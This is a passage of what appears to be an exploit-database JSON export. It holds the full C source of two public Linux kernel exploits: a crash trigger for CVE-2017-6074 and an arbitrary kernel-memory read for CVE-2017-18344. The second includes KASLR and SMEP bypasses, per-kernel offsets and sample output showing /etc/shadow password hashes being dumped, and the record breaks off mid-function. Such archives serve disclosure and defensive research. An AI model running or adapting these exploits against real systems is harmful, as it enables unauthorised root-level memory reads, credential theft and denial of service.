"COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6074"], "modified": "2017-02-26T00:00:00", "id": "EXPLOITPACK:4EEB4BE9E101A3B6E5FA4A3FC9B06CCD", "href": "", "sourceData": "//\n// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471\n//\n// A trigger for CVE-2017-6074, crashes kernel.\n// Tested on 4.4.0-62-generic #83-Ubuntu kernel.\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074\n//\n// Andrey Konovalov <andreyknvl@gmail.com>\n\n#define _GNU_SOURCE\n\n#include <netinet/ip.h>\n\n#include <sys/ioctl.h>\n#include <sys/mman.h>\n#include <sys/socket.h>\n#include <sys/stat.h>\n#include <sys/syscall.h>\n#include <sys/types.h>\n\n#include <stdarg.h>\n#include <stdbool.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\n#include <arpa/inet.h>\n\nint main() {\n\tstruct sockaddr_in6 sa1;\n\tsa1.sin6_family = AF_INET6;\n\tsa1.sin6_port = htons(20002);\n\tinet_pton(AF_INET6, \"::1\", &sa1.sin6_addr);\n\tsa1.sin6_flowinfo = 0;\n\tsa1.sin6_scope_id = 0;\n\t\t\n\tint optval = 8;\n\n\tint s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\n\tbind(s1, &sa1, 0x20);\n\tlisten(s1, 0x9);\n\n\tsetsockopt(s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, 4);\n\n\tint s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\n\tconnect(s2, &sa1, 0x20);\n\n\tshutdown(s1, SHUT_RDWR);\n\tclose(s1);\n\tshutdown(s2, SHUT_RDWR);\n\tclose(s2);\n\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-08-11T09:54:16", "description": "", "cvss3": {}, "published": "2018-08-09T00:00:00", "type": "packetstorm", "title": "Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) Arbitrary File Read", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-18344"], "modified": 
"2018-08-09T00:00:00", "id": "PACKETSTORM:148867", "href": "https://packetstormsecurity.com/files/148867/Linux-Kernel-4.14.7-Ubuntu-16.04-CentOS-7-Arbitrary-File-Read.html", "sourceData": "`// A proof-of-concept exploit for CVE-2017-18344. \n// Includes KASLR and SMEP bypasses. No SMAP bypass. \n// No support for 1 GB pages or 5 level page tables. \n// Tested on Ubuntu xenial 4.4.0-116-generic and 4.13.0-38-generic \n// and on CentOS 7 3.10.0-862.9.1.el7.x86_64. \n// \n// gcc pwn.c -o pwn \n// \n// $ ./pwn search 'root:!:' \n// [.] setting up proc reader \n// [~] done \n// [.] checking /proc/cpuinfo \n// [~] looks good \n// [.] setting up timer \n// [~] done \n// [.] finding leak pointer address \n// [+] done: 000000022ca45b60 \n// [.] mapping leak pointer page \n// [~] done \n// [.] divide_error: ffffffffad6017b0 \n// [.] kernel text: ffffffffacc00000 \n// [.] page_offset_base: ffffffffade48a90 \n// [.] physmap: ffff8d40c0000000 \n// [.] task->mm->pgd: ffffffffade0a000 \n// [.] searching [0000000000000000, 00000000f524d000) for 'root:!:': \n// [.] now at 0000000000000000 \n// [.] now at 0000000002000000 \n// [.] now at 0000000004000000 \n// ... \n// [.] now at 000000008c000000 \n// [.] now at 000000008e000000 \n// [.] now at 0000000090000000 \n// [+] found at 0000000090ff3000 \n// [+] done \n// \n// $ ./pwn phys 0000000090ff3000 1000 shadow \n// [.] setting up proc reader \n// [~] done \n// [.] checking /proc/cpuinfo \n// [~] looks good \n// [.] setting up timer \n// [~] done \n// [.] finding leak pointer address \n// [+] done: 000000022ca45b60 \n// [.] mapping leak pointer page \n// [~] done \n// [.] divide_error: ffffffffad6017b0 \n// [.] kernel text: ffffffffacc00000 \n// [.] page_offset_base: ffffffffade48a90 \n// [.] physmap: ffff8d40c0000000 \n// [.] task->mm->pgd: ffffffffade0a000 \n// [.] 
dumping physical memory [0000000090ff3000, 0000000090ff4000): \n// [+] done \n// \n// $ cat shadow \n// root:!:17612:0:99999:7::: \n// daemon:*:17590:0:99999:7::: \n// bin:*:17590:0:99999:7::: \n// ... \n// saned:*:17590:0:99999:7::: \n// usbmux:*:17590:0:99999:7::: \n// user:$1$7lXXXXSv$rvXXXXXXXXXXXXXXXXXhr/:17612:0:99999:7::: \n// \n// Andrey Konovalov <andreyknvl@gmail.com> \n \n#define _GNU_SOURCE \n \n#include <assert.h> \n#include <ctype.h> \n#include <fcntl.h> \n#include <signal.h> \n#include <stdarg.h> \n#include <stdbool.h> \n#include <stdint.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <time.h> \n#include <unistd.h> \n \n#include <sys/ioctl.h> \n#include <sys/mman.h> \n#include <sys/stat.h> \n#include <sys/sysinfo.h> \n#include <sys/syscall.h> \n#include <sys/types.h> \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define DEBUG 0 \n \n// CentOS 7 3.10.0-862.9.1.el7.x86_64 \n#define KERNEL_START 0xffffffff81000000ul \n#define O_DIVIDE_ERROR (0xffffffff81723a40ul - KERNEL_START) \n#define O_INIT_TASK (0xffffffff81c16480ul - KERNEL_START) \n#define O_INIT_MM (0xffffffff81c914a0ul - KERNEL_START) \n#define O_PAGE_OFFSET_BASE (0xffffffff81c41440ul - KERNEL_START) \n#define O_TASK_STRUCT_TASKS 1072 \n#define O_TASK_STRUCT_MM 1128 \n#define O_TASK_STRUCT_PID 1188 \n#define O_MM_STRUCT_MMAP 0 \n#define O_MM_STRUCT_PGD 88 \n#define O_VM_AREA_STRUCT_VM_START 0 \n#define O_VM_AREA_STRUCT_VM_END 8 \n#define O_VM_AREA_STRUCT_VM_NEXT 16 \n#define O_VM_AREA_STRUCT_VM_FLAGS 80 \n \n#if 0 \n// Ubuntu xenial 4.4.0-116-generic \n#define KERNEL_START 0xffffffff81000000ul \n#define O_DIVIDE_ERROR (0xffffffff81851240ul - KERNEL_START) \n#define O_INIT_TASK (0xffffffff81e13500ul - KERNEL_START) \n#define O_INIT_MM (0xffffffff81e73c80ul - KERNEL_START) \n#define O_PAGE_OFFSET_BASE 0 \n#define O_TASK_STRUCT_TASKS 848 \n#define O_TASK_STRUCT_MM 928 \n#define O_TASK_STRUCT_PID 1096 \n#define 
O_MM_STRUCT_MMAP 0 \n#define O_MM_STRUCT_PGD 64 \n#define O_VM_AREA_STRUCT_VM_START 0 \n#define O_VM_AREA_STRUCT_VM_END 8 \n#define O_VM_AREA_STRUCT_VM_NEXT 16 \n#define O_VM_AREA_STRUCT_VM_FLAGS 80 \n#endif \n \n#if 0 \n// Ubuntu xenial 4.13.0-38-generic \n#define KERNEL_START 0xffffffff81000000ul \n#define O_DIVIDE_ERROR (0xffffffff81a017b0ul - KERNEL_START) \n#define O_INIT_TASK (0xffffffff82212480ul - KERNEL_START) \n#define O_INIT_MM (0xffffffff82302760ul - KERNEL_START) \n#define O_PAGE_OFFSET_BASE (0xffffffff82248a90ul - KERNEL_START) \n#define O_TASK_STRUCT_TASKS 2048 \n#define O_TASK_STRUCT_MM 2128 \n#define O_TASK_STRUCT_PID 2304 \n#define O_MM_STRUCT_MMAP 0 \n#define O_MM_STRUCT_PGD 80 \n#define O_VM_AREA_STRUCT_VM_START 0 \n#define O_VM_AREA_STRUCT_VM_END 8 \n#define O_VM_AREA_STRUCT_VM_NEXT 16 \n#define O_VM_AREA_STRUCT_VM_FLAGS 80 \n#endif \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#ifndef SYS_memfd_create \n#define SYS_memfd_create 319 \n#endif \n \n#ifndef O_PATH \n#define O_PATH 010000000 \n#endif \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define PAGE_SHIFT 12 \n#define PAGE_SIZE (1ul << PAGE_SHIFT) \n#define PAGE_MASK (~(PAGE_SIZE - 1)) \n \n#define HUGE_PAGE_SHIFT 21 \n#define HUGE_PAGE_SIZE (1ul << HUGE_PAGE_SHIFT) \n#define HUGE_PAGE_MASK (~(HUGE_PAGE_SIZE - 1)) \n \n#define TASK_SIZE (1ul << 47) \n#define PAGE_OFFSET_BASE 0xffff880000000000ul \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define LOG_INFO 1 \n#define LOG_DEBUG 2 \n \n#define log(level, format, args...) 
\\ \ndo { \\ \nif (level == LOG_INFO) \\ \nprintf(format, ## args); \\ \nelse \\ \nfprintf(stderr, format, ## args); \\ \n} while(0) \n \n#define info(format, args...) log(LOG_INFO, format, ## args) \n \n#if (DEBUG >= 1) \n#define debug1(format, args...) log(LOG_DEBUG, format, ## args) \n#else \n#define debug1(format, args...) \n#endif \n \n#if (DEBUG >= 2) \n#define debug2(format, args...) log(LOG_DEBUG, format, ## args) \n#else \n#define debug2(format, args...) \n#endif \n \n#define min(x, y) ((x) < (y) ? (x) : (y)) \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic void print_chunk(int level, unsigned long src_addr, char *buffer, \nint len, int chunk_size) { \nint i; \n \nassert(len <= chunk_size); \n \nlog(level, \"%016lx: \", src_addr); \nfor (i = 0; i < len; i++) \nlog(level, \"%02hx \", (unsigned char)buffer[i]); \nfor (i = len; i < chunk_size; i++) \nlog(level, \" \"); \n \nlog(level, \" \"); \n \nfor (i = 0; i < len; i++) { \nif (isalnum(buffer[i])) \nlog(level, \"%c\", buffer[i]); \nelse \nlog(level, \".\"); \n} \n \nlog(level, \"\\n\"); \n} \n \nstatic void print_bytes(int level, unsigned long src_addr, char *buffer, \nint len) { \nint chunk_size = 16; \nassert(chunk_size % 2 == 0); \n \nint chunk; \nfor (chunk = 0; chunk < len / chunk_size; chunk++) \nprint_chunk(level, src_addr + chunk * chunk_size, \n&buffer[chunk * chunk_size], chunk_size, chunk_size); \n \nint rem = len % chunk_size; \nif (rem != 0) \nprint_chunk(level, src_addr + len - rem, \n&buffer[len - rem], rem, chunk_size); \n} \n \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define MIN_KERNEL_BASE 0xffffffff81000000ul \n#define MAX_KERNEL_BASE 0xffffffffff000000ul \n#define MAX_KERNEL_IMAGE 0x8000000ul // 128 MB \n \n#define MMAP_ADDR_SPAN 
(MAX_KERNEL_BASE - MIN_KERNEL_BASE + MAX_KERNEL_IMAGE) \n#define MMAP_ADDR_START 0x200000000ul \n#define MMAP_ADDR_END (MMAP_ADDR_START + MMAP_ADDR_SPAN) \n \n#define OPTIMAL_PTR_OFFSET ((MMAP_ADDR_START - MIN_KERNEL_BASE) / 8) \n// == 0x4fe00000 \n \n#define MAX_MAPPINGS 1024 \n#define MEMFD_SIZE (MMAP_ADDR_SPAN / MAX_MAPPINGS) \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic struct proc_reader g_proc_reader; \nstatic unsigned long g_leak_ptr_addr = 0; \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define PROC_INITIAL_SIZE 1024 \n#define PROC_CHUNK_SIZE 1024 \n \nstruct proc_reader { \nchar *buffer; \nint buffer_size; \nint read_size; \n}; \n \nstatic void proc_init(struct proc_reader* pr) { \ndebug2(\"proc_init: %016lx\\n\", pr); \n \npr->buffer = malloc(PROC_INITIAL_SIZE); \nif (pr->buffer == NULL) { \nperror(\"[-] proc_init: malloc()\"); \nexit(EXIT_FAILURE); \n} \npr->buffer_size = PROC_INITIAL_SIZE; \npr->read_size = 0; \n \ndebug2(\"proc_init = void\\n\"); \n} \n \nstatic void proc_ensure_size(struct proc_reader* pr, int size) { \nif (pr->buffer_size >= size) \nreturn; \nwhile (pr->buffer_size < size) \npr->buffer_size <<= 1; \npr->buffer = realloc(pr->buffer, pr->buffer_size); \nif (pr->buffer == NULL) { \nperror(\"[-] proc_ensure_size: realloc()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nstatic int proc_read(struct proc_reader* pr, const char *file) { \ndebug2(\"proc_read: file: %s, pr->buffer_size: %d\\n\", \nfile, pr->buffer_size); \n \nint fd = open(file, O_RDONLY); \nif (fd == -1) { \nperror(\"[-] proc_read: open()\"); \nexit(EXIT_FAILURE); \n} \n \npr->read_size = 0; \nwhile (true) { \nproc_ensure_size(pr, pr->read_size + PROC_CHUNK_SIZE); \nint bytes_read = read(fd, &pr->buffer[pr->read_size], \nPROC_CHUNK_SIZE); \nif (bytes_read == -1) { \nperror(\"[-] read(proc)\"); \nexit(EXIT_FAILURE); \n} \npr->read_size += bytes_read; \nif (bytes_read < PROC_CHUNK_SIZE) 
\nbreak; \n} \n \nclose(fd); \n \ndebug2(\"proc_read = %d\\n\", pr->read_size); \nreturn pr->read_size; \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \ntypedef union k_sigval { \nint sival_int; \nvoid *sival_ptr; \n} k_sigval_t; \n \n#define __ARCH_SIGEV_PREAMBLE_SIZE (sizeof(int) * 2 + sizeof(k_sigval_t)) \n#define SIGEV_MAX_SIZE 64 \n#define SIGEV_PAD_SIZE ((SIGEV_MAX_SIZE - __ARCH_SIGEV_PREAMBLE_SIZE) \\ \n/ sizeof(int)) \n \ntypedef struct k_sigevent { \nk_sigval_t sigev_value; \nint sigev_signo; \nint sigev_notify; \nunion { \nint _pad[SIGEV_PAD_SIZE]; \nint _tid; \n \nstruct { \nvoid (*_function)(sigval_t); \nvoid *_attribute; \n} _sigev_thread; \n} _sigev_un; \n} k_sigevent_t; \n \nstatic void leak_setup() { \nk_sigevent_t se; \nmemset(&se, 0, sizeof(se)); \nse.sigev_signo = SIGRTMIN; \nse.sigev_notify = OPTIMAL_PTR_OFFSET; \ntimer_t timerid = 0; \n \nint rv = syscall(SYS_timer_create, CLOCK_REALTIME, \n(void *)&se, &timerid); \nif (rv != 0) { \nperror(\"[-] timer_create()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nstatic void leak_parse(char *in, int in_len, char **start, char **end) { \nconst char *needle = \"notify: \"; \n*start = memmem(in, in_len, needle, strlen(needle)); \nassert(*start != NULL); \n*start += strlen(needle); \n \nassert(in_len > 0); \nassert(in[in_len - 1] == '\\n'); \n*end = &in[in_len - 2]; \nwhile (*end > in && **end != '\\n') \n(*end)--; \nassert(*end > in); \nwhile (*end > in && **end != '/') \n(*end)--; \nassert(*end > in); \nassert((*end)[1] = 'p' && (*end)[2] == 'i' && (*end)[3] == 'd'); \n \nassert(*end >= *start); \n} \n \nstatic void leak_once(char **start, char **end) { \nint read_size = proc_read(&g_proc_reader, \"/proc/self/timers\"); \nleak_parse(g_proc_reader.buffer, read_size, start, end); \n} \n \nstatic int leak_once_and_copy(char *out, int out_len) { \nassert(out_len > 0); \n \nchar *start, *end; \nleak_once(&start, &end); \n \nint size = min(end - start, out_len); 
\nmemcpy(out, start, size); \n \nif (size == out_len) \nreturn size; \n \nout[size] = 0; \nreturn size + 1; \n} \n \nstatic void leak_range(unsigned long addr, size_t length, char *out) { \nsize_t total_leaked = 0; \nwhile (total_leaked < length) { \nunsigned long addr_to_leak = addr + total_leaked; \n*(unsigned long *)g_leak_ptr_addr = addr_to_leak; \ndebug2(\"leak_range: offset %ld, addr: %lx\\n\", \ntotal_leaked, addr_to_leak); \nint leaked = leak_once_and_copy(out + total_leaked, \nlength - total_leaked); \ntotal_leaked += leaked; \n} \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic void mmap_fixed(unsigned long addr, size_t size) { \nvoid *rv = mmap((void *)addr, size, PROT_READ | PROT_WRITE, \nMAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \nif (rv != (void *)addr) { \nperror(\"[-] mmap()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nstatic void mmap_fd_over(int fd, unsigned long fd_size, unsigned long start, \nunsigned long end) { \nint page_size = PAGE_SIZE; \nassert(fd_size % page_size == 0); \nassert(start % page_size == 0); \nassert(end % page_size == 0); \nassert((end - start) % fd_size == 0); \n \ndebug1(\"mmap_fd_over: [%lx, %lx)\\n\", start, end); \n \nunsigned long addr; \nfor (addr = start; addr < end; addr += fd_size) { \nvoid *rv = mmap((void *)addr, fd_size, PROT_READ, \nMAP_FIXED | MAP_PRIVATE, fd, 0); \nif (rv != (void *)addr) { \nperror(\"[-] mmap()\"); \nexit(EXIT_FAILURE); \n} \n} \n \ndebug1(\"mmap_fd_over = void\\n\"); \n} \n \nstatic void remap_fd_over(int fd, unsigned long fd_size, unsigned long start, \nunsigned long end) { \nint rv = munmap((void *)start, end - start); \nif (rv != 0) { \nperror(\"[-] munmap()\"); \nexit(EXIT_FAILURE); \n} \nmmap_fd_over(fd, fd_size, start, end); \n} \n \n#define MEMFD_CHUNK_SIZE 0x1000 \n \nstatic int create_filled_memfd(const char *name, unsigned long size, \nunsigned long value) { \nint i; \nchar buffer[MEMFD_CHUNK_SIZE]; \n \nassert(size % 
MEMFD_CHUNK_SIZE == 0); \n \nint fd = syscall(SYS_memfd_create, name, 0); \nif (fd < 0) { \nperror(\"[-] memfd_create()\"); \nexit(EXIT_FAILURE); \n} \n \nfor (i = 0; i < sizeof(buffer) / sizeof(value); i++) \n*(unsigned long *)&buffer[i * sizeof(value)] = value; \n \nfor (i = 0; i < size / sizeof(buffer); i++) { \nint bytes_written = write(fd, &buffer[0], sizeof(buffer)); \nif (bytes_written != sizeof(buffer)) { \nperror(\"[-] write(memfd)\"); \nexit(EXIT_FAILURE); \n} \n} \n \nreturn fd; \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic const char *evil = \"evil\"; \nstatic const char *good = \"good\"; \n \nstatic bool bisect_probe() { \nchar *start, *end; \nleak_once(&start, &end); \nreturn *start == 'g'; \n} \n \nstatic unsigned long bisect_via_memfd(unsigned long fd_size, \nunsigned long start, unsigned long end) { \nassert((end - start) % fd_size == 0); \n \nint fd_evil = create_filled_memfd(\"evil\", fd_size, (unsigned long)evil); \nint fd_good = create_filled_memfd(\"good\", fd_size, (unsigned long)good); \n \nunsigned long left = 0; \nunsigned long right = (end - start) / fd_size; \n \nwhile (right - left > 1) { \nunsigned long middle = left + (right - left) / 2; \nremap_fd_over(fd_evil, fd_size, start + left * fd_size, \nstart + middle * fd_size); \nremap_fd_over(fd_good, fd_size, start + middle * fd_size, \nstart + right * fd_size); \nbool probe = bisect_probe(); \nif (probe) \nleft = middle; \nelse \nright = middle; \n} \n \nint rv = munmap((void *)start, end - start); \nif (rv != 0) { \nperror(\"[-] munmap()\"); \nexit(EXIT_FAILURE); \n} \n \nclose(fd_evil); \nclose(fd_good); \n \nreturn start + left * fd_size; \n} \n \nstatic unsigned long bisect_via_assign(unsigned long start, unsigned long end) { \nint word_size = sizeof(unsigned long); \n \nassert((end - start) % word_size == 0); \nassert((end - start) % PAGE_SIZE == 0); \n \nmmap_fixed(start, end - start); \n \nunsigned long left = 0; \nunsigned 
long right = (end - start) / word_size; \n \nwhile (right - left > 1) { \nunsigned long middle = left + (right - left) / 2; \nunsigned long a; \nfor (a = left; a < middle; a++) \n*(unsigned long *)(start + a * word_size) = \n(unsigned long)evil; \nfor (a = middle; a < right; a++) \n*(unsigned long *)(start + a * word_size) = \n(unsigned long)good; \nbool probe = bisect_probe(); \nif (probe) \nleft = middle; \nelse \nright = middle; \n} \n \nint rv = munmap((void *)start, end - start); \nif (rv != 0) { \nperror(\"[-] munmap()\"); \nexit(EXIT_FAILURE); \n} \n \nreturn start + left * word_size; \n} \n \nstatic unsigned long bisect_leak_ptr_addr() { \nunsigned long addr = bisect_via_memfd( \nMEMFD_SIZE, MMAP_ADDR_START, MMAP_ADDR_END); \ndebug1(\"%lx %lx\\n\", addr, addr + MEMFD_SIZE); \naddr = bisect_via_memfd(PAGE_SIZE, addr, addr + MEMFD_SIZE); \ndebug1(\"%lx %lx\\n\", addr, addr + PAGE_SIZE); \naddr = bisect_via_assign(addr, addr + PAGE_SIZE); \ndebug1(\"%lx\\n\", addr); \nreturn addr; \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define CPUINFO_SMEP 1 \n#define CPUINFO_SMAP 2 \n#define CPUINFO_KAISER 4 \n#define CPUINFO_PTI 8 \n \nstatic int cpuinfo_scan() { \nint length = proc_read(&g_proc_reader, \"/proc/cpuinfo\"); \nchar *buffer = &g_proc_reader.buffer[0]; \nint rv = 0; \nchar* found = memmem(buffer, length, \"smep\", 4); \nif (found != NULL) \nrv |= CPUINFO_SMEP; \nfound = memmem(buffer, length, \"smap\", 4); \nif (found != NULL) \nrv |= CPUINFO_SMAP; \nfound = memmem(buffer, length, \"kaiser\", 4); \nif (found != NULL) \nrv |= CPUINFO_KAISER; \nfound = memmem(buffer, length, \" pti\", 4); \nif (found != NULL) \nrv |= CPUINFO_PTI; \nreturn rv; \n} \n \nstatic void cpuinfo_check() { \nint rv = cpuinfo_scan(); \nif (rv & CPUINFO_SMAP) { \ninfo(\"[-] SMAP detected, no bypass available, aborting\\n\"); \nexit(EXIT_FAILURE); \n} \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
\n \nstatic void arbitrary_read_init() { \ninfo(\"[.] setting up proc reader\\n\"); \nproc_init(&g_proc_reader); \ninfo(\"[~] done\\n\"); \n \ninfo(\"[.] checking /proc/cpuinfo\\n\"); \ncpuinfo_check(); \ninfo(\"[~] looks good\\n\"); \n \ninfo(\"[.] setting up timer\\n\"); \nleak_setup(); \ninfo(\"[~] done\\n\"); \n \ninfo(\"[.] finding leak pointer address\\n\"); \ng_leak_ptr_addr = bisect_leak_ptr_addr(); \ninfo(\"[+] done: %016lx\\n\", g_leak_ptr_addr); \n \ninfo(\"[.] mapping leak pointer page\\n\"); \nmmap_fixed(g_leak_ptr_addr & ~(PAGE_SIZE - 1), PAGE_SIZE); \ninfo(\"[~] done\\n\"); \n} \n \nstatic void read_range(unsigned long addr, size_t length, char *buffer) { \nleak_range(addr, length, buffer); \n} \n \nstatic uint64_t read_8(unsigned long addr) { \nuint64_t result; \nread_range(addr, sizeof(result), (char *)&result); \nreturn result; \n} \n \nstatic uint32_t read_4(unsigned long addr) { \nuint32_t result; \nread_range(addr, sizeof(result), (char *)&result); \nreturn result; \n} \n \nstatic uint64_t read_field_8(unsigned long addr, int offset) { \nreturn read_8(addr + offset); \n} \n \nstatic uint64_t read_field_4(unsigned long addr, int offset) { \nreturn read_4(addr + offset); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstruct idt_register { \nuint16_t length; \nuint64_t base; \n} __attribute__((packed)); \n \nstruct idt_gate { \nuint16_t offset_1; // bits 0..15 \nuint32_t shit_1; \nuint16_t offset_2; // bits 16..31 \nuint32_t offset_3; // bits 32..63 \nuint32_t shit_2; \n} __attribute__((packed)); \n \nstatic uint64_t idt_gate_addr(struct idt_gate *gate) { \nuint64_t addr = gate->offset_1 + ((uint64_t)gate->offset_2 << 16) + \n((uint64_t)gate->offset_3 << 32); \nreturn addr; \n} \n \nstatic void get_idt(struct idt_register *idtr) { \nasm ( 
\"sidt %0\" : : \"m\"(*idtr) ); \ndebug1(\"get_idt_base: base: %016lx, length: %d\\n\", \nidtr->base, idtr->length); \n} \n \nstatic void print_idt(int entries) { \nchar buffer[4096]; \nstruct idt_register idtr; \nint i; \n \nget_idt(&idtr); \nassert(idtr.length <= sizeof(buffer)); \nread_range(idtr.base, idtr.length, &buffer[0]); \n \ninfo(\"base: %016lx, length: %d\\n\", idtr.base, \n(int)idtr.length); \n \nentries = min(entries, idtr.length / sizeof(struct idt_gate)); \nfor (i = 0; i < entries; i++) { \nstruct idt_gate *gate = (struct idt_gate *)&buffer[0] + i; \nuint64_t addr = idt_gate_addr(gate); \ninfo(\"gate #%03d: %016lx\\n\", i, addr); \n} \n} \n \nstatic uint64_t read_idt_gate(int i) { \nchar buffer[4096]; \nstruct idt_register idtr; \n \nget_idt(&idtr); \nassert(idtr.length <= sizeof(buffer)); \nassert(i <= idtr.length / sizeof(struct idt_gate)); \nread_range(idtr.base, idtr.length, &buffer[0]); \n \nstruct idt_gate *gate = (struct idt_gate *)&buffer[0] + i; \nuint64_t addr = idt_gate_addr(gate); \nreturn addr; \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define PTRS_PER_PGD 512 \n#define PTRS_PER_PUD 512 \n#define PTRS_PER_PMD 512 \n#define PTRS_PER_PTE 512 \n \n#define PGD_SHIFT 39 \n#define PUD_SHIFT 30 \n#define PMD_SHIFT 21 \n \n#define pgd_index(addr) (((addr) >> PGD_SHIFT) & (PTRS_PER_PGD - 1)) \n#define pud_index(addr) (((addr) >> PUD_SHIFT) & (PTRS_PER_PUD - 1)) \n#define pmd_index(addr) (((addr) >> PMD_SHIFT) & (PTRS_PER_PMD - 1)) \n#define pte_index(addr) (((addr) >> PAGE_SHIFT) & (PTRS_PER_PTE - 1)) \n \n#define _PAGE_BIT_PRESENT 0 \n#define _PAGE_BIT_ACCESSED 5 \n#define _PAGE_BIT_DIRTY 6 \n#define _PAGE_BIT_PSE 7 \n#define _PAGE_BIT_GLOBAL 8 \n#define _PAGE_BIT_PROTNONE _PAGE_BIT_GLOBAL \n \n#define _PAGE_PRESENT (1ul << 
_PAGE_BIT_PRESENT) \n#define _PAGE_ACCESSED (1ul << _PAGE_BIT_ACCESSED) \n#define _PAGE_DIRTY (1ul << _PAGE_BIT_DIRTY) \n#define _PAGE_PSE (1ul << _PAGE_BIT_PSE) \n#define _PAGE_PROTNONE (1ul << _PAGE_BIT_PROTNONE) \n#define _PAGE_KNL_ERRATUM_MASK (_PAGE_DIRTY | _PAGE_ACCESSED) \n \n#define pgd_none(value) ((value) == 0) \n#define pud_none(value) (((value) & ~(_PAGE_KNL_ERRATUM_MASK)) == 0) \n#define pmd_none(value) (((value) & ~(_PAGE_KNL_ERRATUM_MASK)) == 0) \n#define pte_none(value) (((value) & ~(_PAGE_KNL_ERRATUM_MASK)) == 0) \n \n#define __PHYSICAL_MASK_SHIFT 52 \n#define __PHYSICAL_MASK ((1ul << __PHYSICAL_MASK_SHIFT) - 1) \n#define PHYSICAL_PAGE_MASK (PAGE_MASK & __PHYSICAL_MASK) \n#define PTE_PFN_MASK (PHYSICAL_PAGE_MASK) \n#define PTE_FLAGS_MASK (~PTE_PFN_MASK) \n \n#define pgd_flags(value) (value & PTE_FLAGS_MASK) \n#define pud_flags(value) (value & PTE_FLAGS_MASK) \n#define pmd_flags(value) (value & PTE_FLAGS_MASK) \n#define pte_flags(value) (value & PTE_FLAGS_MASK) \n \n#define pgd_present(value) (pgd_flags(value) & _PAGE_PRESENT) \n#define pud_present(value) (pud_flags(value) & _PAGE_PRESENT) \n#define pmd_present(value) (pmd_flags(value) & (_PAGE_PRESENT | \\ \n_PAGE_PROTNONE | _PAGE_PSE)) \n#define pte_present(value) (pte_flags(value) & (_PAGE_PRESENT | \\ \n_PAGE_PROTNONE)) \n \nstruct pte_entry { \nunsigned long addr; \nunsigned long entries[PTRS_PER_PTE]; \n}; \n \nstruct pmd_entry { \nunsigned long addr; \nstruct { \nbool huge; \nunion { \nstruct pte_entry *pte; \nunsigned long phys; \n}; \n} entries[PTRS_PER_PMD]; \n}; \n \nstruct pud_entry { \nunsigned long addr; \nstruct pmd_entry *entries[PTRS_PER_PUD]; \n}; \n \nstruct pgd_entry { \nunsigned long addr; \nstruct pud_entry *entries[PTRS_PER_PGD]; \n}; \n \nstruct ptsc { \nunsigned long physmap; \nstruct pgd_entry entry; \n}; \n \nstatic struct pte_entry *ptsc_alloc_pte_entry(unsigned long addr) { \nstruct pte_entry *entry = malloc(sizeof(*entry)); \nif (!entry) { \nperror(\"[-] malloc()\"); 
